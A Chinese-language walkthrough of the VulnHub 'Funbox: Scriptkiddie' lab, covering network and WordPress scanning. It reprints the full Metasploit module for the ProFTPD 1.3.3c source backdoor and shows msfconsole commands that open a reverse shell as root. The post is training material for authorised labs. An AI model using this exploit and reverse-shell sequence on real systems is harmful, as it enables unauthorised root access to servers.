vulhub系列-58-Funbox: Scriptkiddie(超详细)

免责声明:本文记录的是 Funbox: Scriptkiddie 渗透测试靶机 的解题过程,所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用,请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规,自觉维护网络空间安全。

复制代码
环境:
https://download.vulnhub.com/funbox/Funbox11.ova

一、信息收集

1、探测目标IP地址

复制代码
arp-scan -l   #探测当前网段的所有ip地址
复制代码
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.5.1 0a:00:27:00:00:04   (Unknown: locally administered)
192.168.5.2 08:00:27:e0:71:d3   PCS Systemtechnik GmbH
192.168.5.14    08:00:27:99:7a:37   PCS Systemtechnik GmbH
​
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.953 seconds (131.08 hosts/sec). 3 responded
​
复制代码
nmap -sP 192.168.5.0/24
复制代码
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.5.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 08:29 -0400
Nmap scan report for 192.168.5.1
Host is up (0.00023s latency).
MAC Address: 0A:00:27:00:00:04 (Unknown)
Nmap scan report for 192.168.5.2
Host is up (0.00019s latency).
MAC Address: 08:00:27:E0:71:D3 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.14
Host is up (0.00039s latency).
MAC Address: 08:00:27:99:7A:37 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.5.11
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.01 seconds
复制代码
目标IP:192.168.5.14

2、探测目标IP开放端口

复制代码
nmap -sV -p- 192.168.5.14
复制代码
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.5.14
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-11 08:29 -0400
Nmap scan report for 192.168.5.14
Host is up (0.000078s latency).
Not shown: 65527 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.3c
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:99:7A:37 (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
​
复制代码
端口:21、22、25、80、110、139、143、445

3、目录探测

复制代码
dirsearch -u http://192.168.5.14
复制代码
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.5.14
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/reports/http_192.168.5.14/_26-03-11_08-31-29.txt

Target: http://192.168.5.14/

[08:31:29] Starting: 
[08:31:31] 403 -  277B  - /.ht_wsr.txt                                      
[08:31:31] 403 -  277B  - /.htaccess.bak1                                   
[08:31:31] 403 -  277B  - /.htaccess.orig                                   
[08:31:31] 403 -  277B  - /.htaccess.sample
[08:31:31] 403 -  277B  - /.htaccess.save                                   
[08:31:31] 403 -  277B  - /.htaccess_extra
[08:31:31] 403 -  277B  - /.htaccess_orig                                   
[08:31:31] 403 -  277B  - /.htaccessBAK
[08:31:31] 403 -  277B  - /.htaccess_sc
[08:31:31] 403 -  277B  - /.htaccessOLD
[08:31:31] 403 -  277B  - /.htaccessOLD2
[08:31:31] 403 -  277B  - /.html                                            
[08:31:31] 403 -  277B  - /.htm                                             
[08:31:31] 403 -  277B  - /.htpasswd_test                                   
[08:31:31] 403 -  277B  - /.httr-oauth
[08:31:31] 403 -  277B  - /.htpasswds
[08:31:31] 403 -  277B  - /.php                                             
[08:31:31] 403 -  277B  - /.php3                                            
[08:31:48] 301 -    0B  - /index.php  ->  http://192.168.5.14/              
[08:31:49] 404 -    8KB - /index.php/login/                                 
[08:31:50] 200 -    7KB - /license.txt                                      
[08:31:58] 200 -    3KB - /readme.html                                      
[08:31:59] 403 -  277B  - /server-status                                    
[08:31:59] 403 -  277B  - /server-status/
[08:32:07] 301 -  315B  - /wp-admin  ->  http://192.168.5.14/wp-admin/      
[08:32:07] 200 -    0B  - /wp-config.php                                    
[08:32:07] 302 -    0B  - /wp-admin/  ->  http://funbox11/wp-login.php?redirect_to=http%3A%2F%2F192.168.5.14%2Fwp-admin%2F&reauth=1
[08:32:07] 400 -    1B  - /wp-admin/admin-ajax.php                          
[08:32:07] 200 -  507B  - /wp-admin/install.php                             
[08:32:07] 409 -    3KB - /wp-admin/setup-config.php                        
[08:32:07] 301 -  317B  - /wp-content  ->  http://192.168.5.14/wp-content/  
[08:32:07] 200 -    0B  - /wp-content/
[08:32:07] 200 -   84B  - /wp-content/plugins/akismet/akismet.php           
[08:32:07] 500 -    0B  - /wp-content/plugins/hello.php                     
[08:32:07] 200 -  478B  - /wp-content/uploads/                              
[08:32:07] 200 -  416B  - /wp-content/upgrade/
[08:32:07] 301 -  318B  - /wp-includes  ->  http://192.168.5.14/wp-includes/
[08:32:07] 200 -    0B  - /wp-includes/rss-functions.php                    
[08:32:07] 200 -    4KB - /wp-includes/                                     
[08:32:07] 200 -    0B  - /wp-cron.php                                      
[08:32:07] 200 -    2KB - /wp-login.php                                     
[08:32:07] 302 -    0B  - /wp-signup.php  ->  http://funbox11/wp-login.php?action=register
[08:32:08] 405 -   42B  - /xmlrpc.php                                       
                                                                             
Task Completed
复制代码
dirb http://192.168.5.14
复制代码
┌──(root㉿kali)-[~]
└─# dirb http://192.168.5.14

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Mar 11 08:33:12 2026
URL_BASE: http://192.168.5.14/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.5.14/ ----
+ http://192.168.5.14/index.php (CODE:301|SIZE:0)                                      
+ http://192.168.5.14/server-status (CODE:403|SIZE:277)                                
==> DIRECTORY: http://192.168.5.14/wp-admin/                                           
==> DIRECTORY: http://192.168.5.14/wp-content/                                         
==> DIRECTORY: http://192.168.5.14/wp-includes/                                        
+ http://192.168.5.14/xmlrpc.php (CODE:405|SIZE:42)                                    
                                                                                       
---- Entering directory: http://192.168.5.14/wp-admin/ ----
+ http://192.168.5.14/wp-admin/admin.php (CODE:302|SIZE:0)                             
==> DIRECTORY: http://192.168.5.14/wp-admin/css/                                       
==> DIRECTORY: http://192.168.5.14/wp-admin/images/                                    
==> DIRECTORY: http://192.168.5.14/wp-admin/includes/                                  
+ http://192.168.5.14/wp-admin/index.php (CODE:302|SIZE:0)                             
==> DIRECTORY: http://192.168.5.14/wp-admin/js/                                        
==> DIRECTORY: http://192.168.5.14/wp-admin/maint/                                     
==> DIRECTORY: http://192.168.5.14/wp-admin/network/                                   
==> DIRECTORY: http://192.168.5.14/wp-admin/user/                                      
                                                                                       
---- Entering directory: http://192.168.5.14/wp-content/ ----
+ http://192.168.5.14/wp-content/index.php (CODE:200|SIZE:0)                           
==> DIRECTORY: http://192.168.5.14/wp-content/languages/                               
==> DIRECTORY: http://192.168.5.14/wp-content/plugins/                                 
==> DIRECTORY: http://192.168.5.14/wp-content/themes/                                  
==> DIRECTORY: http://192.168.5.14/wp-content/upgrade/                                 
==> DIRECTORY: http://192.168.5.14/wp-content/uploads/                                 
                                                                                       
---- Entering directory: http://192.168.5.14/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                       
---- Entering directory: http://192.168.5.14/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                       
---- Entering directory: http://192.168.5.14/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                       
---- Entering directory: http://192.168.5.14/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                       
---- Entering directory: http://192.168.5.14/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                       
---- Entering directory: http://192.168.5.14/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                       
---- Entering directory: http://192.168.5.14/wp-admin/network/ ----
+ http://192.168.5.14/wp-admin/network/admin.php (CODE:302|SIZE:0)                     
+ http://192.168.5.14/wp-admin/network/index.php (CODE:302|SIZE:0)                     
                                                                                       
---- Entering directory: http://192.168.5.14/wp-admin/user/ ----
+ http://192.168.5.14/wp-admin/user/admin.php (CODE:302|SIZE:0)                        
+ http://192.168.5.14/wp-admin/user/index.php (CODE:302|SIZE:0)                        
                                                                                       
---- Entering directory: http://192.168.5.14/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                       
---- Entering directory: http://192.168.5.14/wp-content/plugins/ ----
+ http://192.168.5.14/wp-content/plugins/index.php (CODE:200|SIZE:0)                   
                                                                                       
---- Entering directory: http://192.168.5.14/wp-content/themes/ ----
+ http://192.168.5.14/wp-content/themes/index.php (CODE:200|SIZE:0)                    
                                                                                       
---- Entering directory: http://192.168.5.14/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                       
---- Entering directory: http://192.168.5.14/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Wed Mar 11 08:33:20 2026
DOWNLOADED: 32284 - FOUND: 12
复制代码
gobuster dir -u http://192.168.5.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
复制代码
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.5.14 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.5.14
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 317] [--> http://192.168.5.14/wp-content/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.5.14/]
/wp-includes          (Status: 301) [Size: 318] [--> http://192.168.5.14/wp-includes/]
/wp-login.php         (Status: 200) [Size: 7339]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 315] [--> http://192.168.5.14/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://funbox11/wp-login.php?action=register]
/server-status        (Status: 403) [Size: 277]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
            

二、漏洞利用

1、信息搜集

复制代码
192.168.5.14

在主页点击MOUNT FUJI!

靶机描述中提到我们添加域名解析

复制代码
Description
As always, it’s a very easy box for beginners.

Add to your /etc/hosts: funbox11

This works better with VirtualBox rather than VMware.
复制代码
192.168.5.14 funbox11

2、wpscan扫描

复制代码
wpscan --url http://funbox11/ --enumerate u
复制代码
┌──(root㉿kali)-[~]
└─# wpscan --url http://funbox11/ --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://funbox11/ [192.168.5.14]
[+] Started: Wed Mar 11 08:49:05 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://funbox11/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://funbox11/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://funbox11/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://funbox11/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
 | Found By: Rss Generator (Passive Detection)
 |  - http://funbox11/index.php/feed/, <generator>https://wordpress.org/?v=5.7.2</generator>
 |  - http://funbox11/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.7.2</generator>

[+] WordPress theme in use: block-lite
 | Location: http://funbox11/wp-content/themes/block-lite/
 | Last Updated: 2022-05-30T00:00:00.000Z
 | Readme: http://funbox11/wp-content/themes/block-lite/README.txt
 | [!] The version is out of date, the latest version is 1.3
 | Style URL: http://funbox11/wp-content/themes/block-lite/style.css?ver=5.7.2
 | Style Name: Block Lite
 | Style URI: https://organicthemes.com/theme/block-lite/
 | Description: The Block Lite theme features a modern and responsive design with a block style layout for blog post...
 | Author: Organic Themes
 | Author URI: https://organicthemes.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://funbox11/wp-content/themes/block-lite/style.css?ver=5.7.2, Match: 'Version: 1.2.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://funbox11/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Mar 11 08:49:09 2026
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 12.984 KB
[+] Data Received: 192.543 KB
[+] Memory used: 189.039 MB
[+] Elapsed time: 00:00:03

得出admin用户

3、枚举密码

复制代码
wpscan --url http://funbox11/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin

枚举失败

4、ProFTPD 1.3.3c 后门命令执行漏洞

复制代码
searchsploit ProFTPD 1.3.3c

searchsploit -m 16921.rb

cat 16921.rb 
复制代码
┌──(root㉿kali)-[~]
└─# searchsploit ProFTPD 1.3.3c
------------------------------------------------------ ---------------------------------
 Exploit Title                                        |  Path
------------------------------------------------------ ---------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote C | linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasplo | linux/remote/16921.rb
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                        
┌──(root㉿kali)-[~]
└─# searchsploit -m 16921.rb   
  Exploit: ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/16921
     Path: /usr/share/exploitdb/exploits/linux/remote/16921.rb
    Codes: OSVDB-69562
 Verified: True
File Type: Ruby script, ASCII text
Copied to: /root/16921.rb

                                                                                        
┌──(root㉿kali)-[~]
└─# cat 16921.rb 
##
# $Id: proftpd_133c_backdoor.rb 11214 2010-12-03 12:34:38Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ProFTPD-1.3.3c Backdoor Command Execution',
			'Description'    => %q{
					This module exploits a malicious backdoor that was added to the
				ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]
				archive between November 28th 2010 and 2nd December 2010.
			},
			'Author'         => [ 'MC', 'darkharper2' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11214 $',
			'References'     =>
				[
					[ 'OSVDB', '69562'],
					[ 'BID', '45150' ],
					[ 'URL', 'http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org' ],
				],
			'Privileged'     => true,
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 2000,
					'BadChars' => '',
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DisclosureDate' => 'Dec 2 2010',
			'DefaultTarget' => 0))

		deregister_options('FTPUSER', 'FTPPASS')
	end

	def exploit

		connect

		print_status("Sending Backdoor Command")
		sock.put("HELP ACIDBITCHEZ\r\n")

		res = sock.get_once(-1,10)

		if ( res and res =~ /502/ )
			print_error("Not backdoored")
		else
			sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
			handler
		end

		disconnect

	end

end    

5、Exp

复制代码
# 启动Metasploit框架的命令行界面
msfconsole

# 选择使用针对ProFTPD 1.3.3c版本的后门漏洞利用模块
use exploit/unix/ftp/proftpd_133c_backdoor

# 设置目标主机IP地址(受害者)
set rhost 192.168.5.14

# 设置攻击载荷为Unix命令反向Shell
set payload payload/cmd/unix/reverse

# 设置本地主机IP地址(攻击者监听IP)
set lhost 192.168.5.11

# 执行攻击
exploit
复制代码
┌──(root㉿kali)-[~]
└─# msfconsole 
Metasploit tip: Metasploit can be configured at startup, see msfconsole 
--help to learn more
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v6.4.103-dev                               ]
+ -- --=[ 2,584 exploits - 1,319 auxiliary - 1,694 payloads     ]
+ -- --=[ 433 post - 49 encoders - 14 nops - 9 evasion          ]

Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project

msf > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.5.14
rhost => 192.168.5.14
msf exploit(unix/ftp/proftpd_133c_backdoor) > 
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload payload/cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(unix/ftp/proftpd_133c_backdoor) > 
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.5.11
lhost => 192.168.5.11
msf exploit(unix/ftp/proftpd_133c_backdoor) > 
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.5.11:4444 
[*] 192.168.5.14:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo DlOaSFpWZByPVTk9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "DlOaSFpWZByPVTk9\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.5.11:4444 -> 192.168.5.14:44482) at 2026-03-11 08:56:35 -0400

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

whoami
root

cd /root

ls
root.txt

cat root.txt
$$$$$$$$\                  $$\                                                                       
$$  _____|                 $$ |                                                                      
$$ |   $$\   $$\ $$$$$$$\  $$$$$$$\   $$$$$$\  $$\   $$\ $$\                                         
$$$$$\ $$ |  $$ |$$  __$$\ $$  __$$\ $$  __$$\ \$$\ $$  |\__|                                        
$$  __|$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ /  $$ | \$$$$  /                                             
$$ |   $$ |  $$ |$$ |  $$ |$$ |  $$ |$$ |  $$ | $$  $$<  $$\                                         
$$ |   \$$$$$$  |$$ |  $$ |$$$$$$$  |\$$$$$$  |$$  /\$$\ \__|                                        
\__|    \______/ \__|  \__|\_______/  \______/ \__/  \__|                                            
                                                                                                     
                                                                                                     
                                                                                                     
 $$$$$$\                      $$\            $$\     $$\       $$\       $$\       $$\ $$\           
$$  __$$\                     \__|           $$ |    $$ |      \__|      $$ |      $$ |\__|          
$$ /  \__| $$$$$$$\  $$$$$$\  $$\  $$$$$$\ $$$$$$\   $$ |  $$\ $$\  $$$$$$$ | $$$$$$$ |$$\  $$$$$$\  
\$$$$$$\  $$  _____|$$  __$$\ $$ |$$  __$$\\_$$  _|  $$ | $$  |$$ |$$  __$$ |$$  __$$ |$$ |$$  __$$\ 
 \____$$\ $$ /      $$ |  \__|$$ |$$ /  $$ | $$ |    $$$$$$  / $$ |$$ /  $$ |$$ /  $$ |$$ |$$$$$$$$ |
$$\   $$ |$$ |      $$ |      $$ |$$ |  $$ | $$ |$$\ $$  _$$<  $$ |$$ |  $$ |$$ |  $$ |$$ |$$   ____|
\$$$$$$  |\$$$$$$$\ $$ |      $$ |$$$$$$$  | \$$$$  |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ 
 \______/  \_______|\__|      \__|$$  ____/   \____/ \__|  \__|\__| \_______| \_______|\__| \_______|
                                  $$ |                                                               
                                  $$ |                                                               
                                  \__|                                                               

Please, tweet this to: @0815R2d2
Thank you...

成功提权后,在root目录下**root.txt**拿到flag

复制代码
id

whoami

cd /root

ls

cat root.txt
复制代码
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.5.11:4444 
[*] 192.168.5.14:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo DlOaSFpWZByPVTk9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "DlOaSFpWZByPVTk9\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.5.11:4444 -> 192.168.5.14:44482) at 2026-03-11 08:56:35 -0400
​
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
​
whoami
root
​
cd /root
​
ls
root.txt
​
cat root.txt
$$$$$$$$\                  $$\                                                                       
$$  _____|                 $$ |                                                                      
$$ |   $$\   $$\ $$$$$$$\  $$$$$$$\   $$$$$$\  $$\   $$\ $$\                                         
$$$$$\ $$ |  $$ |$$  __$$\ $$  __$$\ $$  __$$\ \$$\ $$  |\__|                                        
$$  __|$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ /  $$ | \$$$$  /                                             
$$ |   $$ |  $$ |$$ |  $$ |$$ |  $$ |$$ |  $$ | $$  $$<  $$\                                         
$$ |   \$$$$$$  |$$ |  $$ |$$$$$$$  |\$$$$$$  |$$  /\$$\ \__|                                        
\__|    \______/ \__|  \__|\_______/  \______/ \__/  \__|                                            
                                                                                                     
                                                                                                     
                                                                                                     
 $$$$$$\                      $$\            $$\     $$\       $$\       $$\       $$\ $$\           
$$  __$$\                     \__|           $$ |    $$ |      \__|      $$ |      $$ |\__|          
$$ /  \__| $$$$$$$\  $$$$$$\  $$\  $$$$$$\ $$$$$$\   $$ |  $$\ $$\  $$$$$$$ | $$$$$$$ |$$\  $$$$$$\  
\$$$$$$\  $$  _____|$$  __$$\ $$ |$$  __$$\\_$$  _|  $$ | $$  |$$ |$$  __$$ |$$  __$$ |$$ |$$  __$$\ 
 \____$$\ $$ /      $$ |  \__|$$ |$$ /  $$ | $$ |    $$$$$$  / $$ |$$ /  $$ |$$ /  $$ |$$ |$$$$$$$$ |
$$\   $$ |$$ |      $$ |      $$ |$$ |  $$ | $$ |$$\ $$  _$$<  $$ |$$ |  $$ |$$ |  $$ |$$ |$$   ____|
\$$$$$$  |\$$$$$$$\ $$ |      $$ |$$$$$$$  | \$$$$  |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ 
 \______/  \_______|\__|      \__|$$  ____/   \____/ \__|  \__|\__| \_______| \_______|\__| \_______|
                                  $$ |                                                               
                                  $$ |                                                               
                                  \__|                                                               
​
Please, tweet this to: @0815R2d2
Thank you...

本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路,始于合规,终于责任。

相关推荐
chenglin01612 小时前
AI 服务企业级数据隐私与安全
网络·人工智能·安全
一名优秀的码农14 小时前
vulhub系列-57-Thoth Tech: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
小陈工15 小时前
Python Web开发入门(十一):RESTful API设计原则与最佳实践——让你的API既优雅又好用
开发语言·前端·人工智能·后端·python·安全·restful
汤愈韬16 小时前
路由反射器实验、环回接口建立IBGP邻居、更新源检查机制
网络·网络协议·网络安全·security
黎阳之光16 小时前
视频孪生赋能车路云一体化,领跑智慧高速新征程
人工智能·算法·安全·数字孪生
独角鲸网络安全实验室17 小时前
Java常见面试题及答案汇总(2025最新版)
java·安全·面试·面试题·考试·考试题·面试攻略
探索者0119 小时前
CTFHub靶场---SSRF攻击
安全·web安全·ssrf靶场
wAEWQ6Ib720 小时前
当今互联网安全的基石 - TLS/SSL
网络·安全·ssl
white-persist20 小时前
【vulhub weblogic CVE-2017-10271漏洞复现】vulhub weblogic CVE-2017-10271漏洞复现详细解析
java·运维·服务器·网络·数据库·算法·安全